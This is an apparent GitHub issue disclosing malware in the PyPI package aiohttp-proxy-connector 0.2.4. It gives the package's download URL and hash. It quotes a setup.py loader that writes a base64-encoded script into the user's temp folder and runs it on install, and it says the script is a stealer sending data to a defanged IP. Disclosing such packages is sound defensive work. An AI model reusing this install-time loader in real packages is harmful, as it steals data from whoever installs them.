-
Notifications
You must be signed in to change notification settings - Fork 1.1k
Description
Following package has malware in it https://pypi.org/project/aiohttp-proxy-connector/ (version 0.2.4)
https://files.pythonhosted.org/packages/90/f4/c58223b905c4ad88a50f1cf06a8abf155536b131703fd092162af5d0aecb/aiohttp_proxy_connector-0.2.4.tar.gz
SHA256: 755e79308a30418bf070cb0f96d4e8cb0b2db85424f16b19a447c31333910657
setup.py contains script, that drops base64-encoded .py file and running it
def run(): import sys from os import chdir, environ from os.path import join from subprocess import call executable = sys.executable.replace('\\', '\\\\') LOCAL = environ['USERPROFILE'] TEMP = join(LOCAL, 'appdata', 'local', 'temp') main_dir = join(TEMP, '__pycache__') chdir(main_dir) call(f"{executable} main.cpython-39.py") with open(join(main_dir, 'main.cpython-39.py'), 'w', encoding='utf8') as f: f.write(b64('...long line...')) run()
Base64-encoded script is python obfuscated stealer:

And everything collected from victum PC will be sent to hxxp://144.24.115.170